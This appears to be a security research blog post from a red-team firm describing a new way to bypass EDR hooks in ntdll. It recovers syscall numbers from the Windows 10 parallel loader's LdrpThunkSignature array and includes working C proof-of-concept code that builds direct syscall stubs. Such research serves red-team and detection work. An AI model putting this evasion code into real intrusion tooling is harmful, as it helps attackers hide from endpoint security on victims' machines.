Post-exploitation tooling designed to operate within mature environments is frequently required to slip past endpoint detection and response (EDR) software running on the target. EDR frequently operate by hooking Windows API functions, especially those exported by ntdll (specifically the Nt/Zw*()
syscall-based API functions). Since all interaction with the underlying operating system will pass through these functions under normal circumstances this provides an ideal point of interception when it comes to detecting unwanted application behaviour.
Previously MDSec have discussed various methods by which circumvention of these hooks can be achieved in our post Bypassing User-Mode Hooks and Direct Invocation of System Calls for Red Teams [1] however since EDR frequently play a game of catch-up with researchers, techniques can and have been developed by the most innovative products to detect several – if not all – of the techniques described. There is therefore some value in identifying novel techniques for achieving hook circumvention.
During the development of the Nighthawk C2 [2] MDSec stumbled upon what appears to be a new and novel technique for identifying syscall numbers for certain syscalls which may then be used to load a new copy of ntdll into memory, allowing the remaining syscalls to be read successfully without triggering any installed function hooks. The technique involves abusing copies of certain syscalls made early during process initialisation by the new Windows 10 parallel loader.
Beginning with Windows 10, Microsoft introduced the concept of parallel DLL loading. Parallel loading allows a process to perform the process of recursively mapping DLLs imported via process module import tables in parallel rather than synchronously on a single thread – leading to performance gains during initial application launch.
We first noticed the existence of the parallel loader when attempting to understand why – in a simple single threaded application – there were three or four additional threads created. Examining these threads confirmed that these were thread pool workers. Rather than attempt to reverse engineer the work queued to these threads we took to Google in the hope that someone else had already asked (and hopefully answered) the same question.
Google returned only a few results but amongst those which were returned there was a blog post by Jeffery Tang at BlackBerry from 2017 [3] and an excellent StackOverflow answer to essentially the same question for which I was seeking an answer, from a user RbMm [4], who had also done an excellent job of providing pseudocode to help illuminate the steps involved in the process. Between them these articles clearly illuminated what was going on under the hood and I recommend them both if further understanding the inner workings of the parallel loader itself is of any interest.
One thing which caught my eye immediately when reading the StackOverflow answer was the fact that the parallel loader short-circuited the parallel DLL load and fell back to synchronous mode if several core low-level native API were found to be detoured. These APIs were involved in the process of opening and mapping images from disk.
The relevant section from the StackOverflow answer is reproduced below but of course remains the work of user RbMm. Quoted verbatim below:
LdrpInitializeProcess() calls void LdrpDetectDetour(). This name speaks for itself. it does not return a value but initializes the global variable BOOLEAN LdrpDetourExist. This routine first checks whether some loader critical routines are hooked - currently these are 5 routines:
NtOpenFile
NtCreateSection
NtQueryAttributesFile
NtOpenSection
NtMapViewOfSection
If yes - LdrpDetourExist = TRUE;
If not hooked - ThreadDynamicCodePolicyInfo is queried - full code:
void LdrpDetectDetour()
{
if (LdrpDetourExist) return ;
static PVOID LdrpCriticalLoaderFunctions[] = {
NtOpenFile,
NtCreateSection,
ZwQueryAttributesFile,
ZwOpenSection,
ZwMapViewOfSection,
};
static M128A LdrpThunkSignature[5] = {
//***
};
ULONG n = RTL_NUMBER_OF(LdrpCriticalLoaderFunctions);
M128A* ppv = (M128A*)LdrpCriticalLoaderFunctions;
M128A* pps = LdrpThunkSignature;
do
{
if (ppv->Low != pps->Low || ppv->High != pps->High)
{
if (LdrpDebugFlags & 5)
{
DbgPrint("!!! Detour detected, disable parallel loading\n");
LdrpDetourExist = TRUE;
return;
}
}
} while (pps++, ppv++, --n);
BOOL DynamicCodePolicy;
if (0 <= ZwQueryInformationThread(NtCurrentThread(), ThreadDynamicCodePolicyInfo, &DynamicCodePolicy, sizeof(DynamicCodePolicy), 0))
{
if (LdrpDetourExist = (DynamicCodePolicy == 1))
{
if (LdrpMapAndSnapWork)
{
WaitForThreadpoolWorkCallbacks(LdrpMapAndSnapWork, TRUE);//TpWaitForWork
TpReleaseWork(LdrpMapAndSnapWork);//CloseThreadpoolWork
LdrpMapAndSnapWork = 0;
TpReleasePool(LdrpThreadPool);//CloseThreadpool
LdrpThreadPool = 0;
}
}
}
The above pseudocode for function LdrpDetectDetour()
is essentially examining the first 16 bytes of code for five native API functions NtOpenFile()
, NtCreateSection()
, ZwQueryAttributeFile()
, ZwOpenSection()
and ZwMapViewOfFile()
and determining whether these bytes have been modified from the known good bytes stored within the LdrpThunkSignature
array stored within ntdll.
(A quick disassembly of the LdrpDetectDetour()
function confirms that the behaviour described in pseudocode above remains, however it should be mentioned that the function now additionally verifies the integrity of a further 27 native API but still only compares exact syscall stubs for the five functions detailed.)
Examination of ntdll with IDA Pro revealed that the LdrpDetectDetour()
function is called from two places: LdrpLoadDllInternal()
(called directly from LdrpLoadDll()
) and LdrpEnableParallelLoading()
(called late into LdrpInitializeProcess()
). Since the LdrpDetectDetour()
function configures a global variable which can halt the parallel load and force further loads to occur synchonously, and many DLLs which install detours (such as EDR user-space components) do so immediately upon being loaded into a process, it makes sense for the detour detection function to be called repeatedly upon loading each new DLL dependency.
Investigation of this process invites a question however – where do the known good stubs for the five native API functions come from? Initial expectations were that the syscall stubs would be hardcoded at compile time during code generation, however examining the LdrpThunkSignature
array statically indicates that this is not the case since the array is not initialised until ntdll is mapped (as the array resides in the uninitialised .data
section).
Taking a data cross-reference of LdrpThunkSignature
identifies one other use of the array, within LdrpCaptureCriticalThunks()
, this function in turn is called into early by LdrpInitializeProcess()
before any import dependencies have been loaded (and hence before third-party modules which may install detours have been loaded into the process).
Quickly hand decompiling LdrpCaptureCriticalThunks()
reveals an implementation similar to the following pseudocode:
VOID LdrpCaptureCriticalThunks()
{
const DWORD c_dwNumCriticalLoaderFunctions = 5;
MEMORY_WORKING_SET_EX_INFORMATION rgMemWorkingSetInfo[5];
NTSTATUS ntStatus;
for (DWORD i = 0; i < c_dwNumCriticalLoaderFunctions; i++)
{
rgMemWorkingSetInfo[i].VirtualAddress = LdrpCriticalLoaderFunctions[i];
}
ntStatus = ZwQueryVirtualMemory(NtCurrentProcess(), NULL, MemoryWorkingSetExInformation, rgMemWorkingSetInfo, sizeof(rgMemWorkingSetInfo), 0);
if (NT_SUCCESS(ntStatus))
{
for (DWORD i = 0; i < c_dwNumCriticalLoaderFunctions; i++)
{
if (!rgMemWorkingSetInfo[i].VirtualAttributes.Bad)
{
goto ExitError;
}
LdrpThunkSignature[i] = *(__m128 *)LdrpCriticalLoaderFunctions[i];
}
return;
}
ExitError:
LdrpDetourExist = TRUE;
}
From the above it can be clearly seen that the first 16 bytes of each syscall stub for the five critical functions are copied out of each function and into the LdrpThunkSignature
array by LdrpCaptureCriticalThunks()
.
A reader experienced with post-exploitation tool development will no doubt at this stage see where this blog post is headed; with these five critical functions and knowledge of their syscall numbers (read directly from LdrpThunkSignature
) we have sufficient native API functions to be able to read a fresh copy of ntdll from disk using syscalls.
Since the LdrpThunkSignature
array is not exported by ntdll we need to locate this in the ntdll .data
section. The array can be identified by the presence of the common syscall prologue:
0:001> u ntdll!LdrpThunkSignature
ntdll!LdrpThunkSignature:
00007ff9`2e1860d0 4c8bd1 mov r10,rcx
00007ff9`2e1860d3 b833000000 mov eax,33h
00007ff9`2e1860d8 f604250803fe7f01 test byte ptr [SharedUserData+0x308 (00000000`7ffe0308)],1
00007ff9`2e1860e0 4c8bd1 mov r10,rcx
00007ff9`2e1860e3 b84a000000 mov eax,4Ah
00007ff9`2e1860e8 f604250803fe7f01 test byte ptr [SharedUserData+0x308 (00000000`7ffe0308)],1
00007ff9`2e1860f0 4c8bd1 mov r10,rcx
00007ff9`2e1860f3 b83d000000 mov eax,3Dh
0:001> db ntdll!LdrpThunkSignature
00007ff9`2e1860d0 4c 8b d1 b8 33 00 00 00-f6 04 25 08 03 fe 7f 01 L...3.....%.....
00007ff9`2e1860e0 4c 8b d1 b8 4a 00 00 00-f6 04 25 08 03 fe 7f 01 L...J.....%.....
00007ff9`2e1860f0 4c 8b d1 b8 3d 00 00 00-f6 04 25 08 03 fe 7f 01 L...=.....%.....
00007ff9`2e186100 4c 8b d1 b8 37 00 00 00-f6 04 25 08 03 fe 7f 01 L...7.....%.....
00007ff9`2e186110 4c 8b d1 b8 28 00 00 00-f6 04 25 08 03 fe 7f 01 L...(.....%.....
Code which is able to use this information to recover the required syscalls follows (an extract from the implementation provided by MDSec to recover all syscalls):
BOOL InitSyscallsFromLdrpThunkSignature()
{
PPEB Peb = (PPEB)__readgsqword(0x60);
PPEB_LDR_DATA Ldr = Peb->Ldr;
PLDR_DATA_TABLE_ENTRY NtdllLdrEntry = NULL;
for (PLDR_DATA_TABLE_ENTRY LdrEntry = (PLDR_DATA_TABLE_ENTRY)Ldr->InLoadOrderModuleList.Flink;
LdrEntry->DllBase != NULL;
LdrEntry = (PLDR_DATA_TABLE_ENTRY)LdrEntry->InLoadOrderLinks.Flink)
{
if (_wcsnicmp(LdrEntry->BaseDllName.Buffer, L"ntdll.dll", 9) == 0)
{
// got ntdll
NtdllLdrEntry = LdrEntry;
break;
}
}
if (NtdllLdrEntry == NULL)
{
return FALSE;
}
PIMAGE_NT_HEADERS ImageNtHeaders = (PIMAGE_NT_HEADERS)((ULONG_PTR)NtdllLdrEntry->DllBase + ((PIMAGE_DOS_HEADER)NtdllLdrEntry->DllBase)->e_lfanew);
PIMAGE_SECTION_HEADER SectionHeader = (PIMAGE_SECTION_HEADER)((ULONG_PTR)&ImageNtHeaders->OptionalHeader + ImageNtHeaders->FileHeader.SizeOfOptionalHeader);
ULONG_PTR DataSectionAddress = NULL;
DWORD DataSectionSize;
for (WORD i = 0; i < ImageNtHeaders->FileHeader.NumberOfSections; i++)
{
if (!strcmp((char*)SectionHeader[i].Name, ".data"))
{
DataSectionAddress = (ULONG_PTR)NtdllLdrEntry->DllBase + SectionHeader[i].VirtualAddress;
DataSectionSize = SectionHeader[i].Misc.VirtualSize;
break;
}
}
DWORD dwSyscallNo_NtOpenFile = 0, dwSyscallNo_NtCreateSection = 0, dwSyscallNo_NtMapViewOfSection = 0;
if (!DataSectionAddress || DataSectionSize < 16 * 5)
{
return FALSE;
}
for (UINT uiOffset = 0; uiOffset < DataSectionSize - (16 * 5); uiOffset++)
{
if (*(DWORD*)(DataSectionAddress + uiOffset) == 0xb8d18b4c &&
*(DWORD*)(DataSectionAddress + uiOffset + 16) == 0xb8d18b4c &&
*(DWORD*)(DataSectionAddress + uiOffset + 32) == 0xb8d18b4c &&
*(DWORD*)(DataSectionAddress + uiOffset + 48) == 0xb8d18b4c &&
*(DWORD*)(DataSectionAddress + uiOffset + 64) == 0xb8d18b4c)
{
dwSyscallNo_NtOpenFile = *(DWORD*)(DataSectionAddress + uiOffset + 4);
dwSyscallNo_NtCreateSection = *(DWORD*)(DataSectionAddress + uiOffset + 16 + 4);
dwSyscallNo_NtMapViewOfSection = *(DWORD*)(DataSectionAddress + uiOffset + 64 + 4);
break;
}
}
if (!dwSyscallNo_NtOpenFile)
{
return FALSE;
}
ULONG_PTR SyscallRegion = (ULONG_PTR)VirtualAlloc(NULL, 3 * MAX_SYSCALL_STUB_SIZE, MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE);
if (!SyscallRegion)
{
return FALSE;
}
NtOpenFile = (FUNC_NTOPENFILE)BuildSyscallStub(SyscallRegion, dwSyscallNo_NtOpenFile);
NtCreateSection = (FUNC_NTCREATESECTION)BuildSyscallStub(SyscallRegion + MAX_SYSCALL_STUB_SIZE, dwSyscallNo_NtCreateSection);
NtMapViewOfSection = (FUNC_NTMAPVIEWOFSECTION)BuildSyscallStub(SyscallRegion + (2* MAX_SYSCALL_STUB_SIZE), dwSyscallNo_NtMapViewOfSection);
return TRUE;
}
An implementation which recovers all syscalls using the above to read ntdll from disk may be found on the MDSec ActiveBreach GitHub repository.
This implementation is of course a PoC and is not optimal from an opsec perspective (for example, the syscall stubs are allocated using RWX memory created using VirtualAlloc()
).
This post was written by @peterwintrsmith.
[1] https://www.mdsec.co.uk/2020/12/bypassing-user-mode-hooks-and-direct-invocation-of-system-calls-for-red-teams/
[2] https://www.mdsec.co.uk/nighthawk/
[3] https://blogs.blackberry.com/en/2017/10/windows-10-parallel-loading-breakdown
[4] https://stackoverflow.com/questions/42789199/why-there-are-three-unexpected-worker-threads-when-a-win32-console-application-s